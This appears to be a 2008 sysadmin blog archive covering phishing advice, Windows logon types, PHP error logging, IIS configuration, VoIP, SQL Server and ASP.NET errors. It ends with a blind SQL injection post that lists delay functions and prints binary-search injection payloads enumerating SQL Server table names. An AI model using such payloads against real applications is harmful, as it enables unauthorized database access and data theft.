The best advice that I can give you is that if you ever get an E-mail message from your bank, your ISP, PayPal, EBay, Amazon, etc., read the note over several times. Odds are that the note will appear legitimate, but you need to look for something fishy (no pun intended). For example, does the note have misspellings or bad grammar? Is this the first message that you have ever gotten from the company? Does the company even have your E-mail address on file? If you have any suspicions at all about the message, then the message is probably illegitimate.

The best thing that you can do is to call the company that allegedly sent you the message. Never use the phone number included in the message though. Instead, take the time to look the phone number up in the phone book. It’s better to spend a few extra minutes looking up a number that you already have in front of you than to be a victim of a scam.

Obviously, you should never click on a link within a suspicious message. If you really must visit the Web site that the message claims to be from, enter the site’s address into your browser manually.

Other precautionary steps that you can take are to review your bank statements and credit card statements regularly to make sure that no one is stealing from you or making purchases in your name.

Finally, if you do receive an E-mail message that proves to be a Phishing scam, you should report the message to the company that the message claims to be from. Doing so makes the company aware of the scam so that they can report it to the proper authorities and help keep other people from being ripped off.

Instant Messaging risks

Instant Messaging (IM) as a business tool can be quite effective, but any tool can be abused, especially if unmanaged. The best way to manage any communication is to ensure that communication is directed through a central point, like a gateway. Vendors have worked this out and have built clients that are gateway aware and that function as both internal and external IM solutions.

Recently there have been many Instant Messaging vulnerabilities. Antivirus vendors are realising that worms, viruses and other malware can spread through IM and are building new defences that reduce the risk.

Links transferred over IM are an additional risk. Application firewalls on the corporate LAN can reduce that risk, but a bigger problem arises when users take their corporate machines offsite. On unprotected networks there is no application layer firewall at the perimeter, so communication is less secure; for this reason the endpoint needs a host-based firewall solution that has scanning capability.

In some organisations where the policy is not to allow Instant Messaging communications, some users have found a way around the firewall technical control by using HTTPS-based websites. These websites effectively bypass the scanning and grant IM access to these users. The problem is that some of these websites deliberately capture the data and credentials for spying.

Because IM does not yet support authentication mechanisms like two-factor authentication, impersonation and unauthorised access are a strong possibility.

Some worms spread by sending links to your entire contact list (W32.Aplore.A@mm, for example); the worm then installs a browser plug-in, and the fun begins. Certain worms patch system files, and when those system files are executed a unique piece of trojanware is downloaded. Backdoors and encrypted tunnels to Internet-based servers are all common.

Some worms are so volatile and aggressive that Symantec reported over 500,000 machines infected and zombified within seven seconds.

Threats like man-in-the-middle attacks, password theft, information disclosure, data leakage and many more similar threats are all possible and create a significant risk to any business or individual.


Are there any benefits?

  • Low communication costs.
  • Instant response.
  • Quicker turn around.
  • Instant file sharing.
  • Collaborative approach.

Is there a balance?

With an enforceable security policy and adequate technical controls it is possible to achieve balance. The implementation of application layer firewalls with fifth generation scanning capabilities will better secure your network. Corporate IM servers that scan and manage connections outbound acting like a proxy can provide for greater management and control over the wave clients being used. A strong security policy that can be enforced and implemented by use of network and endpoint technical controls is a must. User education and awareness is key and a consistent and structured approach will ensure a happy medium.



السبت، 22 نوفمبر 2008

Logon Type Codes (Windows XP, 2003)

The logon/logoff category of the Windows security log gives you the ability to monitor all attempts to access the local computer. In this article I'll examine each logon type in greater detail and show you how some other fields in Logon/Logoff events can be helpful for understanding the nature of a given logon attempt.

Event IDs 528 and 540 signify a successful logon, event ID 538 a logoff, and all the other events in this category, such as 680, identify different reasons for a logon failure. However, just knowing about a successful or failed logon attempt doesn't fill in the whole picture. Because of all the services Windows offers, there are many different ways you can log on to a computer, such as interactively at the computer's local keyboard and screen, over the network through a drive mapping, through terminal services (aka Remote Desktop) or through IIS. Thankfully, logon/logoff events specify the Logon Type code, which reveals the type of logon that prompted the event.

Logon Type 2 – Interactive

This is what occurs to you first when you think of logons, that is, a logon at the console of a computer. You'll see type 2 logons when a user attempts to log on at the local keyboard and screen, whether with a domain account or a local account from the computer's local SAM. To tell the difference between an attempt to log on with a local or domain account, look for the domain or computer name preceding the user name in the event's description. Don't forget that logons through a KVM over IP component or a server's proprietary "lights-out" remote KVM feature are still interactive logons from the standpoint of Windows and will be logged as such.

Logon Type 3 – Network

Windows logs logon type 3 in most cases when you access a computer from elsewhere on the network. One of the most common sources of logon events with logon type 3 is connections to shared folders or printers. But other over-the-network logons are classed as logon type 3 as well such as most logons to IIS. (The exception is basic authentication which is explained in Logon Type 8 below.)

Logon Type 4 – Batch

When Windows executes a scheduled task, the Scheduled Task service first creates a new logon session for the task so that it can run under the authority of the user account specified when the task was created. When this logon attempt occurs, Windows logs it as logon type 4. Other job scheduling systems, depending on their design, may also generate logon events with logon type 4 when starting jobs. Logon type 4 events are usually just innocent scheduled task startups, but a malicious user could try to subvert security by trying to guess the password of an account through scheduled tasks. Such attempts would generate a logon failure event where the logon type is 4. But logon failures associated with scheduled tasks can also result from an administrator entering the wrong password for the account at the time of task creation, or from the password of an account being changed without modifying the scheduled task to use the new password.

Logon Type 5 – Service

Similar to Scheduled Tasks, each service is configured to run as a specified user account. When a service starts, Windows first creates a logon session for the specified user account which results in a Logon/Logoff event with logon type 5. Failed logon events with logon type 5 usually indicate the password of an account has been changed without updating the service but there's always the possibility of malicious users at work too. However this is less likely because creating a new service or editing an existing service by default requires membership in Administrators or Server Operators and such a user, if malicious, will likely already have enough authority to perpetrate his desired goal.

Logon Type 7 – Unlock

Hopefully the workstations on your network automatically start a password protected screen saver when a user leaves their computer so that unattended workstations are protected from malicious use. When a user returns to their workstation and unlocks the console, Windows treats this as a logon and logs the appropriate Logon/Logoff event but in this case the logon type will be 7 – identifying the event as a workstation unlock attempt. Failed logons with logon type 7 indicate either a user entering the wrong password or a malicious user trying to unlock the computer by guessing the password.

Logon Type 8 – NetworkCleartext

This logon type indicates a network logon like logon type 3, but where the password was sent over the network in clear text. Windows Server doesn't allow connections to shared files or printers with clear text authentication. The only situations I'm aware of are logons from within an ASP script using the ADVAPI, or when a user logs on to IIS using IIS's basic authentication mode. In both cases the logon process in the event's description will list advapi. Basic authentication is only dangerous if it isn't wrapped inside an SSL session (i.e. https). As far as logons generated by an ASP script go, remember that embedding passwords in source code is a bad practice for maintenance purposes, as well as for the risk that someone malicious will view the source code and thereby gain the password.

Logon Type 9 – NewCredentials

If you use the RunAs command to start a program under a different user account and specify the /netonly switch, Windows records a logon/logoff event with logon type 9. When you start a program with RunAs using /netonly, the program executes on your local computer as the user you are currently logged on as but for any connections to other computers on the network, Windows connects you to those computers using the account specified on the RunAs command. Without /netonly Windows runs the program on the local computer and on the network as the specified user and records the logon event with logon type 2.

Logon Type 10 – RemoteInteractive

When you access a computer through Terminal Services, Remote Desktop or Remote Assistance, Windows logs the logon attempt with logon type 10, which makes it easy to distinguish true console logons from a remote desktop session. Note however that prior to XP, Windows 2000 doesn't use logon type 10, and terminal services logons are reported as logon type 2.

Logon Type 11 – CachedInteractive

Windows supports a feature called Cached Logons which facilitates mobile users. When you are not connected to your organization's network and attempt to log on to your laptop with a domain account, there's no domain controller available to the laptop with which to verify your identity. To solve this problem, Windows caches a hash of the credentials of the last 10 interactive domain logons. Later, when no domain controller is available, Windows uses these hashes to verify your identity when you attempt to log on with a domain account, and records the logon with logon type 11.

Conclusion

I hope this discussion of logon types and their meanings helps you as you keep watch on your Windows network and try to piece together the different ways users are accessing your computers. Paying attention to logon type is important because different logon types can affect how you interpret logon events from a security perspective. For instance, a failed network logon on a server might not be surprising, since users must access servers over the network all the time. But a failed network logon attempt in a workstation security log is different. Why is anyone trying to access someone else's workstation from over the network? As you can see, it pays to understand the security log.
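The interpretation rules above (success vs. failure event IDs, the logon type, the host's role) can be turned into a small triage script. The following Python is an added example, not code from the article: it parses constructed event records in a simple pipe-delimited format of my own, tallies successful logons by type, and lists failures that deserve a second look, treating a failed network logon differently on a workstation than on a server.

```python
"""Triage Windows XP/2003 Logon/Logoff events by logon type.

Added example, not from the article. The records in SAMPLE_LOG are constructed,
in an invented "event id | user | domain-or-computer | logon type" layout.
Event IDs (528/540 success, 538 logoff, others such as 680 failure) and the
logon type meanings are the ones the article describes.
"""
import re
from collections import Counter
from dataclasses import dataclass

LOGON_TYPES = {
    2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
    8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
    11: "CachedInteractive",
}
SUCCESS_IDS = {528, 540}
LOGOFF_IDS = {538}

SAMPLE_LOG = """\
528|alice|CORP|2
540|backup_svc|CORP|4
680|backup_svc|CORP|4
680|bob|CORP|3
680|bob|CORP|3
680|bob|CORP|3
540|carol|CORP|10
680|dave|WS01|7
538|alice|CORP|2
"""
LINE_RE = re.compile(r"^(\d+)\|([^|]+)\|([^|]+)\|(\d+)$")


@dataclass
class Event:
    event_id: int
    user: str
    realm: str        # domain name, or the computer name for a local SAM account
    logon_type: int


def parse(text):
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(Event(int(m[1]), m[2], m[3], int(m[4])))
    return events


def is_local_account(ev, computer_name):
    """The name preceding the user name tells a local SAM account from a domain one."""
    return ev.realm.upper() == computer_name.upper()


def successes_by_type(events):
    """How each successful logon reached the machine, keyed by logon type name."""
    return Counter(LOGON_TYPES.get(ev.logon_type, "Unknown")
                   for ev in events if ev.event_id in SUCCESS_IDS)


def triage(events, host_role="workstation", threshold=3):
    """Return (user, logon type name, note) for failures worth a second look.

    host_role matters: failed network logons are routine on a server but odd
    on a workstation, which nobody should be reaching over the network.
    """
    failures = Counter((ev.user, ev.logon_type) for ev in events
                       if ev.event_id not in SUCCESS_IDS | LOGOFF_IDS)
    findings = []
    for (user, ltype), count in failures.items():
        name = LOGON_TYPES.get(ltype, "Unknown")
        if ltype == 3 and host_role == "workstation":
            note = "failed network logon to a workstation"
        elif ltype in (4, 5):
            note = "stale password in the task/service, or guessing via scheduled tasks"
        elif ltype == 7 and count >= threshold:
            note = f"{count} unlock failures: possible guessing at a locked console"
        elif ltype == 8:
            note = "cleartext network logon failed: check the ASP or basic-auth source"
        elif count >= threshold:
            note = f"{count} failures"
        else:
            continue
        findings.append((user, name, note))
    return findings


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    print(dict(successes_by_type(evs)))
    for finding in triage(evs):
        print(finding)
```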

الأحد، 2 نوفمبر 2008

How to log PHP Errors with .htaccess 2

Below is the development edition. This setup is ideal for sites that are not yet published to the public, as it will catch and display errors in real time.

.htaccess file: Development Edition

***********************
# PHP error handling for development servers: display every error in the browser and log it too
php_flag display_startup_errors on
php_flag display_errors on
php_flag html_errors on
php_flag log_errors on
php_flag ignore_repeated_errors off
php_flag ignore_repeated_source off
php_flag report_memleaks on
php_flag track_errors on
php_value docref_root 0
php_value docref_ext 0
php_value error_log /home/path/public_html/domain/PHP_errors.log
php_value error_reporting 999999999
php_value log_errors_max_len 0
# protect the log from public access; <Files> matches by file name, not by full path
<Files PHP_errors.log>
Order allow,deny
Deny from all
Satisfy All
</Files>

*****************************

السبت، 1 نوفمبر 2008

How to log PHP Errors with .htaccess file

There are two scripts, with appropriate comments, to help you easily customize your PHP error log file.

There is a production edition which silences all errors, and then there is a development edition which shows all errors in real time as they occur, in addition to the log file.
Below is a production edition which is ideal for a site that is active, live, etc. This edition will make sure that no errors are ever displayed on the live site but instead written to a specified log file.
.htaccess file: Production Edition
*****************
# disable display of startup errors
php_flag display_startup_errors off
# disable display of all other errors
php_flag display_errors off
# disable html markup of errors
php_flag html_errors off
# enable logging of errors
php_flag log_errors on
# disable ignoring of repeat errors
php_flag ignore_repeated_errors off
# disable ignoring of unique source errors
php_flag ignore_repeated_source off
# enable logging of php memory leaks
php_flag report_memleaks on
# preserve most recent error via php_errormsg
php_flag track_errors on
# disable formatting of error reference links
php_value docref_root 0
# disable formatting of error reference links
php_value docref_ext 0
# specify path to php error log
php_value error_log /home/path/public_html/domain/PHP_errors.log
# specify recording of all php errors
php_value error_reporting 999999999
# disable max error string length
php_value log_errors_max_len 0
# protect error log by preventing public access; <Files> matches by file name, not by full path
<Files PHP_errors.log>
Order allow,deny
Deny from all
Satisfy All
</Files>

*************

الأحد، 26 أكتوبر 2008

How to Read Configuration Schema 2

Element Schema

Every element is defined in a corresponding <element> XML element in the schema. Elements can be nested. An element is simply a container for other attributes, or sub-elements. It must have a name and it may serve as a container of default values for collection elements (for example, siteDefaults holds the default values for sites in the <sites> collection).
<ELEMENT
name="" [String, Required] [XML name of the element]
isCollectionDefault="false" [bool] [Indicates if default values are held for other elements in this collection]
/>

Collection Schema

Every collection is defined in a corresponding <collection> XML element in the schema. Collections contain multiple elements, which can be added to and removed from it individually. Typically the collection directive names are "add", "remove" and "clear", but some collections use different names for clarity (for example, the <sites> collection uses "site" instead of "add"). This is done by specifying values for addElement, removeElement and clearElement in the collection schema. If a collection directive is missing from the schema, the collection will not support it. The collection schema may specify the name of a default element that will be used as a container of default values for collection elements (this complements isCollectionDefault in the element schema).

For example, the <sites> collection uses siteDefaults as the default element. Most collections append elements as they merge configuration files down the namespace, but some may specify mergeAppend="false" in the schema to have a prepend behavior. For example, consider two levels of configuration: applicationHost.config and web.config in a site.

In applicationHost.config:
<myCollection>
<add value="1"/>
</myCollection>
In web.config:
<myCollection>
<add value="2"/>
</myCollection>

If the collection appends, its merged (effective) configuration at the site level will be:

<myCollection>
<add value="1"/>
<add value="2"/>
</myCollection>
However, if it prepends, it will be:
<myCollection>
<add value="2"/>
<add value="1"/>
</myCollection>

Some collections may allow duplicate entries by specifying allowDuplicates="true" in their schema. This is mostly done to support legacy collections in the .NET framework (in machine.config).

Some collections may allow additional attributes in them, beyond those specified in the schema. This is done by specifying allowUnrecognizedAttributes="true" in their schema. It is mostly done to support provider-based collections in the .NET framework.

How to Read Configuration Schema

Configuration schema file for IIS settings: %windir%\system32\inetsrv\config\schema\IIS_Schema.xml.

The schema for each configuration section is defined in an XML element. There is no schema definition for section groups. The following format is used here to explain how to read the schema:

<attribute-name>="<default-value>" [<metadata>] [<description>]

<attribute-name> is the name of the configuration attribute, as it appears in XML. Every attribute must have a name.

<default-value> is the value used by default, if no other value is specified in the XML for the attribute. Not all attributes have default values (for example, site name). In this case, the syntax will be "".

<metadata> contains several items:

  • The runtime type of the attribute. This is one of "bool", "enum", "flags", "int", "int64", "String", "timeSpan". Every attribute must have a type.
  • "bool" is "true" or "false".
  • "enum" is a set of possible values, where only one of them can be set for the attribute. Every such value has a numerical value and a friendly name. The syntax is using the character "|" as a delimiter between the friendly names: value1|value2|…|valueN.
  • "flags" is similar to "enum", except that combinations of values are allowed. Therefore the numerical values should be in multiples of 2, so they can be ORed together to form combinations. The syntax is identical to "enum": value1|value2|…|valueN.
  • "int" is a 32 bit integer.
  • "int64" is a 64 bit integer.
  • "String" is a character string.
  • "timeSpan" is a representation of a time unit, similar to the managed-code type TimeSpan. It can be persisted as a number (representing seconds, or minutes); or as a formatted string in the form of "[dd:]hh:mm:ss". The "[dd:]" element represents an optional number of days. The other elements represent numbers of hours, minutes and seconds, respectively. The "timeSpanFormat" attribute specifies which format should be used: number of seconds, number of minutes, or a formatted string.
  • Required attributes are marked "Required". It means that a value for them must be set in the XML. For example, site name is a required attribute (every site must have a name in IIS 7.0).
<description> is a short description of the attribute.

Section Schema

The <sectionSchema> XML element is the base unit of schema information. All other schema information is specified within it. It has one attribute directly in it ("name"), and then the rest of the schema is in sub-elements within it.

Attribute Schema

Every attribute is defined in a corresponding <attribute> XML element in the schema. The <attribute> element may be in the <sectionSchema> element directly (if the attribute is in the section scope); or in the <element> element (if the attribute is in a sub-element within the section); or in the <collection> element (if the attribute is in a collection within the section).
An attribute schema must specify a name and a runtime type for the attribute. It may mark the attribute as required. It may mark the attribute as the unique key (if inside a collection), or as part of a collection key (together with other attributes). It may specify a default value for the attribute. It may mark the attribute for automatic encryption on-disk. It may specify if the word "Infinite" is allowed as a value for the attribute (only for numeric types such as int and int64, and for timeSpan). It may specify the timespan format (seconds, minutes or formatted string) for timespan attributes. It may specify validation rules for the attribute (see the Attribute Validation section below in this document).
<ATTRIBUTE
name="" [String, Required] [XML name of the attribute]
type="" [bool|enum|flags|int|int64|string|timeSpan, Required] [Runtime type]
required="false" [bool] [Indicates if must be set]
isUniqueKey="false" [bool] [Serves as the collection key]
isCombinedKey="false" [bool] [Part of a multi-attribute key]
defaultValue="" [String] [Default value or comma-delimited flags]
encrypted="false" [bool] [Indicates if value persisted is encrypted]
allowInfinite="false" [bool] [Indicates if "Infinite" can be set]
timeSpanFormat="string" [string|seconds|minutes] [hh:mm:ss or number]
validationType="" [See validation below]
validationParameter="" [See validation below]
/>

How to backup / restore IIS7 configuration

Backup/Restore via the command line
Backing up IIS7 configuration is as simple as copying the \windows\system32\inetsrv\config directory (and subdirectories) into a backup directory, so you don't need anything special to do it. Just include this directory in whatever your OS/content back-up plan is, or write a custom script to do it.
To help make managing backups easy, we've added a simple cmd-line option to AppCmd.exe that makes management of backup/restore sets easy. For example, to backup configuration, run the following command:
> %windir%\system32\inetsrv\appcmd.exe add backup "My Backup Name"
to restore that backup, run this command:
> %windir%\system32\inetsrv\appcmd.exe restore backup "My Backup Name"
to delete a backup, run this command:
> %windir%\system32\inetsrv\appcmd.exe delete backup "My Backup Name"

Pretty easy, eh? Except for the dirty little secret everyone knows...remembering to do a backup! Thankfully, IIS7 comes to the rescue here. Thanks to a feature called IIS7 configuration history, IIS will automatically make history snapshots of ApplicationHost.config each time a change is detected, enabling you to easily restore to a prior version. By default, IIS checks for a new version every 2 mins, and will keep 10 prior versions of the file. IIS7 stores these snapshots in the %systemdrive%\inetpub\history folder by default. You can change any of these settings by editing the <system.applicationHost/configHistory> section in ApplicationHost.config.

IMPORTANT NOTE: This feature only appears in Windows Server 2008 and Vista SP1. It is not in the original release version of Vista, as it was not yet finished when Vista first shipped. This is one of the thousands of changes that was made to IIS7 after Vista RTM, and is one of many reasons you should install SP1 as soon as possible!
How do you restore a prior snapshot? Well, you could just go to the \inetpub\history\cfgHistory_NNNNNNNNNN directory and copy the applicationHost.config file into its proper place: \windows\system32\inetsrv\config. Or you can use the same command as above for restoring a backup to restore a configuration history file.
To enumerate a list of backups and configuration history files, use the following command:
> %windir%\system32\inetsrv\appcmd.exe list backup

الجمعة، 24 أكتوبر 2008

How To Choose The Best Voip Provider For Your International Calling Needs

Broadband phone service is so popular because it's cheap - this is why millions of people are disconnecting their traditional land-line service in favor of VoIP (this is the technical term for internet phone service). Once you decide to switch to internet phone service, you'll need to decide on the best VoIP provider for your domestic and international calling needs. There are three main things to consider when choosing a VoIP provider for local and international calling:
1 - The reputation of the VoIP company
2 - Does the VoIP provider have the right plan for your needs?
3 - International long distance rate to your particular destination/s
 
Finding the Best VoIP Providers
The first step in choosing a broadband phone service provider is narrowing down the field of choices to only the best VoIP companies. There are several VoIP providers to choose from, including your local cable company.
Telephone service is very important, and it's extremely important that the VoIP provider you choose provides a high level of reliability and excellent call quality. You also want to be sure that the VoIP company you choose offers excellent and fast technical support. When you switch from dependable (but expensive) land line phone service to internet phone service, the last thing you want is to have problems making or receiving calls - so it's important to choose only a highly-rated broadband phone company!
 
Cable Company VoIP
Your local cable company probably offers internet phone service too, and they should also be considered when choosing the best VoIP provider for your particular needs. Although digital phone service (this is what the cable companies call VoIP - it's still internet phone service) is known to be very reliable, the disadvantage is that it usually costs twice as much! Cable companies usually purchase VoIP service from a true VoIP provider and resell it to you. Because they have to make a profit, they have to charge you more. You can get the same high-quality digital phone service directly from a VoIP company for about 50% less than the cable company charges!
 
Deciding What Type of VoIP Plan You Need
Do you typically make a lot of phone calls? Do you want to be able to keep in touch with friends and loved ones who live far away? Do you want the luxury of being able to talk long distance for hours at a time for free? How many minutes a month are spent making international calls? When calling internationally, which countries do you call? These are questions you should ask yourself before comparing VoIP providers, as your answers define what you really need out of VoIP service.
If you want to make all the local and long distance calls you want within the US, Canada and Puerto Rico, consider getting an unlimited plan. Although this won't give you free international calls, international long distance rates are really cheap with internet phone service. For the absolute best value with an unlimited calling plan, choose an annual plan. With this type of plan, you pay for a whole year of service up front (usually around $200) and get a great price break!
If you want to make free unlimited international calls, consider getting an unlimited international calling plan. Although a bit more expensive than a domestic unlimited calling plan, this will allow you to talk to overseas family and colleagues without incurring any international long distance charges.
If you don't make many calls, your best bet may be to get a limited monthly VoIP plan and then "pay as you go" for international long distance calls. This will be about half the cost of an unlimited plan, and you'll get a set number of monthly minutes.
 
Compare International Long Distance Rates
International long distance calling rates are so low with VoIP that you'll be pleasantly surprised at how much you can talk for so little money! Rates vary among VoIP companies though, so be sure to compare each provider's international rate for the countries you call before deciding on the best VoIP provider for your needs.




Saturday, 27 September 2008

Error: (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance Specified)

A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance Specified)

How to fix SQL Network Interfaces, error: 26?

First of all, you get this error message only when connecting to a SQL Server named instance; for the default instance you never see it. Why? Because even if this stage fails (locating the server/instance), the client continues with default values, e.g. the default TCP port 1433 or the default pipe name for Named Pipes. You may see a different error message from a failure later on, but not this one.

Every time a client connects to a SQL Server named instance, it sends an SSRP (SQL Server Resolution Protocol) UDP packet to UDP port 1434 on the server machine. This step retrieves the configuration of the instance: which protocols are enabled, the TCP port, the pipe name and so on. Without that information the client does not know how to reach the instance and fails with this error message.

In short, the error means the client stack did not receive the SSRP response datagram from the SQL Browser service. It is easy to isolate. Here are the steps:
1) Make sure the server name is correct, e.g. no typo in the name.
2) Make sure the instance name is correct and that such an instance actually exists on the target machine. [Update: Some applications convert \\ to \. If you are not sure about your application, try both Server\Instance and Server\\Instance in the connection string.]
3) Make sure the server machine is reachable, e.g. DNS resolves the name correctly and you can ping the server (ICMP may be blocked, so a failed ping is not conclusive).
4) Make sure the SQL Browser service is running on the server.
5) If a firewall is enabled on the server, add sqlbrowser.exe and/or UDP port 1434 to its exceptions.

Once you have done these steps, you should not see this error message anymore. You may still fail to connect to SQL Server, but the error message will be different and you are then looking at a different issue. [Update: If it still fails, replace server\instance with tcp:server\instance and/or np:server\instance to see whether it succeeds over either TCP or Named Pipes. That way you can isolate the issue a little further.]
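The exchange those steps are diagnosing, as an added example that is not part of the original post: a small Python client that builds the SSRP request the client stack sends to UDP 1434, parses the SQL Browser's answer, and reports the TCP port and pipe name the connection would then use. The sample response bytes are constructed here, not captured from a real server; the host and instance names in it are placeholders.

```python
import socket

SQL_BROWSER_PORT = 1434
CLNT_UCAST_INST = 0x04   # client asks about one named instance
SVR_RESP = 0x05          # SQL Browser answer


def build_request(instance: str) -> bytes:
    """CLNT_UCAST_INST datagram: 0x04 followed by the NUL-terminated instance name.

    This is the packet the client stack sends before it knows how to reach a
    named instance; when nothing answers, the connection fails with error 26.
    """
    return bytes([CLNT_UCAST_INST]) + instance.encode("ascii") + b"\x00"


def parse_response(data: bytes) -> list:
    """SVR_RESP datagram: 0x05, a little-endian 16-bit length, then one
    'key;value;key;value;...;;' record per instance. Returns a list of dicts."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP server response")
    length = int.from_bytes(data[1:3], "little")
    if length > len(data) - 3:
        raise ValueError("truncated SSRP response")
    body = data[3:3 + length].decode("ascii", "replace")
    records = []
    for rec in body.split(";;"):
        if not rec:
            continue
        fields = rec.split(";")
        if len(fields) % 2:
            raise ValueError("malformed SSRP record: " + rec)
        records.append(dict(zip(fields[0::2], fields[1::2])))
    return records


def endpoints(record: dict) -> dict:
    """What the client actually needed from the Browser: the enabled protocols
    and where each one listens (tcp = port, np = pipe name)."""
    return {proto: record[proto] for proto in ("tcp", "np", "via") if proto in record}


def query_browser(host: str, instance: str, timeout: float = 2.0):
    """Real exchange. Returns the parsed records, or None when nothing comes
    back, which is the error 26 condition (wrong instance name, Browser not
    running, UDP/1434 filtered)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_request(instance), (host, SQL_BROWSER_PORT))
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            return None
    return parse_response(data)


# Constructed sample answer (not captured from a real server) so the parser
# can be exercised offline; SQLBOX / SQLEXPRESS are placeholder names.
_SAMPLE_BODY = (b"ServerName;SQLBOX;InstanceName;SQLEXPRESS;IsClustered;No;"
                b"Version;9.00.1399.06;tcp;1433;"
                b"np;\\\\SQLBOX\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;")
SAMPLE_RESPONSE = bytes([SVR_RESP]) + len(_SAMPLE_BODY).to_bytes(2, "little") + _SAMPLE_BODY


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        records = query_browser(sys.argv[1], sys.argv[2])
        print("no SSRP answer: walk the checklist above" if records is None else records)
    else:
        for rec in parse_response(SAMPLE_RESPONSE):
            print(rec["InstanceName"], endpoints(rec))
```

Run it with a host and an instance name to send the real probe. A timeout is exactly the situation behind error 26 and points at steps 2-5 (wrong instance name, Browser stopped, UDP/1434 filtered); a parsed answer without a tcp or np key means that protocol is disabled on the instance, and the next error you get will be a different one.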

Friday, 26 September 2008

Error: "Validation of ViewState MAC failed" with ASP.NET 2.0

Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.

To fix it, set explicit machineKey values (validationKey, decryptionKey and the validation algorithm) in the web.config of the affected application, make sure every server in the farm uses the same values, and see if the issue goes away.

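The web.config snippet this post refers to did not survive here. As an added example that is not the original author's snippet, the following Python prints a machineKey element with explicit random keys of the sizes ASP.NET 2.0 expects, and audits an existing element for the AutoGenerate setting the error message warns about. The attribute names are the real web.config ones; the key values are generated, and the size limits in the audit are the documented ones for SHA1 validation and AES decryption.

```python
import re
import secrets

# Key sizes ASP.NET 2.0 accepts for an explicit machineKey: validationKey
# 20-64 bytes (use the maximum), decryptionKey 16, 24 or 32 bytes for AES.
VALIDATION_KEY_BYTES = 64
DECRYPTION_KEY_BYTES = 32
VALIDATION_ALGORITHMS = ("SHA1", "MD5", "3DES", "AES")

_ATTR = re.compile(r'(\w+)="([^"]*)"')


def machine_key_element(validation: str = "SHA1", decryption: str = "AES") -> str:
    """Build a <machineKey> element with fresh random keys.

    The same element must be configured on every node of the farm, so the
    MAC over ViewState produced by one node verifies on all the others.
    """
    vk = secrets.token_hex(VALIDATION_KEY_BYTES).upper()
    dk = secrets.token_hex(DECRYPTION_KEY_BYTES).upper()
    return (f'<machineKey validationKey="{vk}" decryptionKey="{dk}" '
            f'validation="{validation}" decryption="{decryption}" />')


def _hex_bytes(value: str):
    """Byte length of an even-length hex string, or None if it is not one."""
    return len(value) // 2 if re.fullmatch(r"([0-9A-Fa-f]{2})+", value) else None


def audit_machine_key(element: str) -> list:
    """Check an existing machineKey element the way the error message asks:
    explicit keys, no AutoGenerate, key sizes the framework accepts.
    Returns a list of problems; an empty list means the element is usable
    in a web farm."""
    attrs = dict(_ATTR.findall(element))
    problems = []
    for name, ok_sizes in (("validationKey", range(20, 65)),
                           ("decryptionKey", (16, 24, 32))):
        value = attrs.get(name, "")
        if not value:
            problems.append(f"{name} missing")
        elif "AutoGenerate" in value:
            problems.append(f"{name} uses AutoGenerate, so each node derives its own key")
        elif _hex_bytes(value) not in ok_sizes:
            problems.append(f"{name} must be hex of an accepted size, got {len(value)} chars")
    algo = attrs.get("validation")
    if algo is not None and algo not in VALIDATION_ALGORITHMS:
        problems.append(f"validation={algo!r} is not an algorithm ASP.NET 2.0 accepts")
    return problems


if __name__ == "__main__":
    element = machine_key_element()
    print(element)
    print("problems:", audit_machine_key(element))
```

Generate the element once, put the identical line inside <system.web> on every node of the farm, and keep it out of source control like any other secret. The default, AutoGenerate,IsolateApps, derives a fresh key per machine, which is exactly why a form posted back to a different node fails MAC validation.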



Saturday, 6 September 2008

Blind SQL Injections

About Blind SQL Injections

In a reasonably good production application you generally cannot see error responses on the page, so you cannot extract data through UNION attacks or error-based attacks. You have to use blind SQL injection attacks to extract data. There are two kinds of blind SQL injection.

Normal blind: you cannot see the query result in the page, but you can still tell whether the injected condition is true or false from a difference in the response body or the HTTP status code.
Totally blind: you cannot see any difference in the output at all. This can be an injection into a logging function or similar. Not so common, though.

In normal blinds you can use IF statements or abuse the WHERE clause of the injected query (generally easier); in totally blinds you need to use delay functions and analyse response times. For this you can use WAITFOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in Oracle.

A Real and Slightly Complex Blind SQL Injection Attack Sample

This output was taken from a real private blind SQL injection tool while exploiting a SQL Server back-ended application and enumerating table names. These requests were made for the first character of the first table name. The SQL queries are a bit more complex than strictly necessary, for automation reasons. We are determining the ASCII value of a character via a binary search: the subquery picks the first user table (xtype=0x55, i.e. 'U'; the TOP 0 inside the NOT IN becomes TOP 1, TOP 2, ... to move on to later tables), SUBSTRING(...,1,1) takes its first character, and ISNULL(...,0) turns a missing character into 0 so the end of a name can be detected.

TRUE and FALSE mark the queries that returned true or false.

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--

